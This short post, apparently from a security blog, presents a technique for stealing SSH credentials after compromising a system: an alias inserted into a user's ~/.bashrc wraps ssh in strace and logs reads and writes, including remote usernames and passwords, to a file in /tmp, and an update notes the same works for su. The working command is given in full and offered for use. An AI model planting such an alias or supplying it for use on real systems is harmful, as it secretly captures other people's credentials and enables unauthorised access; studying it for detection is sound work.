If you have compromised a system (while doing penetration testing, obviously), or if you are just a BOFH that wishes to have a little fun, you can do something as easy as this:

Edit the users ~/.bashrc and insert the following alias:

ssh='strace   -o   /tmp/sshpwd-`date    '+%d%h%m%s'`.log  \
 -e read,write,connect  -s2048 ssh' 

Now, every time a user uses the ssh command, he will be using this alias, and all his keystrokes (including the remote system's username/password), will be logged to /tmp.

As I said, this is nothing fancy, and a quick look at the env, at the .bashrc or even at /tmp is enough to spot this. However, for a quick simple solution, it is more than enough.

Update: as one of the readers pointed out, this also works with su, using the exact same trick.